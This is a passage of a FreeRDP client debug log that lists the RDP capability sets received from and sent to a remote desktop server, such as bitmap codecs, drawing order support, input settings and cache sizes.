[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2Octets: 0x0000
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCapabilitySet (length 24):
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	preferredBitsPerPixel: 0x0010
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	receive1BitPerPixel: 0x0001
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	receive4BitsPerPixel: 0x0001
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	receive8BitsPerPixel: 0x0001
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopWidth: 0x0400
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopHeight: 0x0300
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2Octets: 0x0000
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopResizeFlag: 0x0001
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	bitmapCompressionFlag: 0x0001
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	highColorFlags: 0x00
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	drawingFlags: 0x1E
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	multipleRectangleSupport: 0x0001
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsB: 0x0000
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCodecsCapabilitySet (length 92):
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	bitmapCodecCount: 4
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecGuid: 0x
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - CA8D1BB9000F154F589FAE2D1A87E2D6
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] -  (CODEC_GUID_NSCODEC)
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecId: 0
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecPropertiesLength: 3
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecGuid: 0x
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 76772F12BD724463AFB3B73C9C6F7886
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] -  (CODEC_GUID_REMOTEFX)
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecId: 0
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecPropertiesLength: 4
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecGuid: 0x
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 9C4351A6353542AE910CCDFCE5760B58
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] -  (CODEC_GUID_IGNORE)
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecId: 0
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecPropertiesLength: 4
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecGuid: 0x
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 2744CCD49D8A4E74803C0ECBEEA19C54
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] -  (CODEC_GUID_IMAGE_REMOTEFX)
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecId: 0
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	codecPropertiesLength: 4
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - OrderCapabilitySet (length 84):
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad4OctetsA: 0x000F4240
[19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopSaveXGranularity: 0x0001
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopSaveYGranularity: 0x0014
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsA: 0x0000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	maximumOrderLevel: 0x0001
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	numberFonts: 0x0000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	orderFlags: 0x00AA
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	orderSupport:
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		DSTBLT: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		PATBLT: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		SCRBLT: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MEMBLT: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MEM3BLT: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		ATEXTOUT: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		AEXTTEXTOUT: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		DRAWNINEGRID: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		LINETO: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MULTI_DRAWNINEGRID: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		OPAQUE_RECT: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		SAVEBITMAP: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		WTEXTOUT: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MEMBLT_V2: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MEM3BLT_V2: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MULTIDSTBLT: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MULTIPATBLT: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MULTISCRBLT: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MULTIOPAQUERECT: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		FAST_INDEX: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		POLYGON_SC: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		POLYGON_CB: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		POLYLINE: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		UNUSED23: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		FAST_GLYPH: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		ELLIPSE_SC: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		ELLIPSE_CB: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		GLYPH_INDEX: 1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		GLYPH_WEXTTEXTOUT: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		GLYPH_WLONGTEXTOUT: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		GLYPH_WLONGEXTTEXTOUT: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		UNUSED31: 0
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	textFlags: 0x06A1
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	orderSupportExFlags: 0x0006
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad4OctetsB: 0x000F4240
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopSaveSize: 0x000F4240
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsC: 0x0001
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsD: 0x0000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	textANSICodePage: 0x0000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsE: 0x0000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - ColorCacheCapabilitySet (length 4):
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	colorTableCacheSize: 0x0006
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2Octets: 0x0000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCacheHostSupportCapabilitySet (length 4):
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	cacheVersion: 0x01
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad1: 0x00
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2: 0x0000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - PointerCapabilitySet (length 6):
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	colorPointerFlag: 0x0001
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	colorPointerCacheSize: 0x0019
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pointerCacheSize: 0x0019
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - LargePointerCapabilitySet (length 2):
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	largePointerSupportFlags: 0x0001
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - InputCapabilitySet (length 84)
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	inputFlags: 0x0175
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsA: 0x0000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	keyboardLayout: 0x00000000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	keyboardType: 0x00000000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	keyboardSubType: 0x00000000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	keyboardFunctionKey: 0x00000000
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - RemoteProgramsCapabilitySet (length 4):
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	railSupportLevel: 0x0000003F
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - WindowListCapabilitySet (length 7):
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	wndSupportLevel: 0x00000002
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	numIconCaches: 0x03
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	numIconCacheEntries: 0x000C
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - DesktopCompositionCapabilitySet (length 2):
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	compDeskSupportLevel: 0x0001
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - MultifragmentUpdateCapabilitySet (length 4):
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	maxRequestSize: 0x000094A7
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - SurfaceCommandsCapabilitySet (length 8):
[19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	cmdFlags: 0x00000052
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	reserved: 0x00000000
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving 
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - FrameAcknowledgeCapabilitySet (length 4):
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	frameAcknowledge: 0x00000000
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - GeneralCapabilitySet (length 20):
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	osMajorType: 0x0004
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	osMinorType: 0x0007
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	protocolVersion: 0x0200
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsA: 0x0000
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	generalCompressionTypes: 0x0000
[19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	extraFlags: 0x0415
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	updateCapabilityFlag: 0x0000
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	remoteUnshareFlag: 0x0000
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	generalCompressionLevel: 0x0000
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	refreshRectSupport: 0x01
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	suppressOutputSupport: 0x01
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCapabilitySet (length 24):
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	preferredBitsPerPixel: 0x0010
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	receive1BitPerPixel: 0x0001
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	receive4BitsPerPixel: 0x0001
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	receive8BitsPerPixel: 0x0001
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopWidth: 0x0400
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopHeight: 0x0300
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2Octets: 0x0000
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopResizeFlag: 0x0001
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	bitmapCompressionFlag: 0x0001
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	highColorFlags: 0x00
[19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	drawingFlags: 0x0E
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	multipleRectangleSupport: 0x0001
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsB: 0x0000
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - OrderCapabilitySet (length 84):
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad4OctetsA: 0x00000000
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopSaveXGranularity: 0x0001
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopSaveYGranularity: 0x0014
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsA: 0x0000
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	maximumOrderLevel: 0x0001
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	numberFonts: 0x0000
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	orderFlags: 0x00AA
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	orderSupport:
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		DSTBLT: 1
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		PATBLT: 1
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		SCRBLT: 1
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MEMBLT: 0
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MEM3BLT: 0
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		ATEXTOUT: 0
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		AEXTTEXTOUT: 0
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		DRAWNINEGRID: 0
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		LINETO: 1
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MULTI_DRAWNINEGRID: 0
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		OPAQUE_RECT: 0
[19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		SAVEBITMAP: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		WTEXTOUT: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MEMBLT_V2: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MEM3BLT_V2: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MULTIDSTBLT: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MULTIPATBLT: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MULTISCRBLT: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		MULTIOPAQUERECT: 1
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		FAST_INDEX: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		POLYGON_SC: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		POLYGON_CB: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		POLYLINE: 1
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		UNUSED23: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		FAST_GLYPH: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		ELLIPSE_SC: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		ELLIPSE_CB: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		GLYPH_INDEX: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		GLYPH_WEXTTEXTOUT: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		GLYPH_WLONGTEXTOUT: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		GLYPH_WLONGEXTTEXTOUT: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 		UNUSED31: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	textFlags: 0x0000
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	orderSupportExFlags: 0x0004
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad4OctetsB: 0x00000000
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	desktopSaveSize: 0x00038400
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsC: 0x0000
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsD: 0x0000
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	textANSICodePage: 0xFDE9
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsE: 0x0000
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCacheV2CapabilitySet (length 36):
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	cacheFlags: 0x0003
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2: 0x00
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	numCellCaches: 0x05
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	bitmapCache0CellInfo: numEntries: 600 persistent: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	bitmapCache1CellInfo: numEntries: 600 persistent: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	bitmapCache2CellInfo: numEntries: 2048 persistent: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	bitmapCache3CellInfo: numEntries: 4096 persistent: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	bitmapCache4CellInfo: numEntries: 2048 persistent: 0
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - PointerCapabilitySet (length 6):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	colorPointerFlag: 0x0001
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	colorPointerCacheSize: 0x0014
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pointerCacheSize: 0x0014
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - InputCapabilitySet (length 84)
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	inputFlags: 0x013D
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsA: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	keyboardLayout: 0x00000409
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	keyboardType: 0x00000004
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	keyboardSubType: 0x00000000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	keyboardFunctionKey: 0x0000000C
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - BrushCapabilitySet (length 4):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	brushSupportLevel: 0x00000002
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - GlyphCacheCapabilitySet (length 48):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	glyphCache0: Entries: 254 MaximumCellSize: 4
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	glyphCache1: Entries: 254 MaximumCellSize: 4
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	glyphCache2: Entries: 254 MaximumCellSize: 8
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	glyphCache3: Entries: 254 MaximumCellSize: 8
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	glyphCache4: Entries: 254 MaximumCellSize: 16
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	glyphCache5: Entries: 254 MaximumCellSize: 32
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	glyphCache6: Entries: 254 MaximumCellSize: 64
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	glyphCache7: Entries: 254 MaximumCellSize: 128
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	glyphCache8: Entries: 254 MaximumCellSize: 256
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	glyphCache9: Entries: 64 MaximumCellSize: 256
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	fragCache: Entries: 256 MaximumCellSize: 256
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	glyphSupportLevel: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2Octets: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - VirtualChannelCapabilitySet (length 8):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	flags: 0x00000000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	VCChunkSize: 0x00000640
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - SoundCapabilitySet (length 4):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	soundFlags: 0x0001
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2OctetsA: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - ShareCapabilitySet (length 4):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	nodeId: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2Octets: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - FontCapabilitySet (length 4):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	fontSupportFlags: 0x0001
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2Octets: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - ControlCapabilitySet (length 8):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	controlFlags: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	remoteDetachFlag: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	controlInterest: 0x0002
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	detachInterest: 0x0002
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - ColorCacheCapabilitySet (length 4):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	colorTableCacheSize: 0x0006
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	pad2Octets: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - WindowActivationCapabilitySet (length 8):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	helpKeyFlag: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	helpKeyIndexFlag: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	helpExtendedKeyFlag: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	windowManagerKeyFlag: 0x0000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - LargePointerCapabilitySet (length 2):
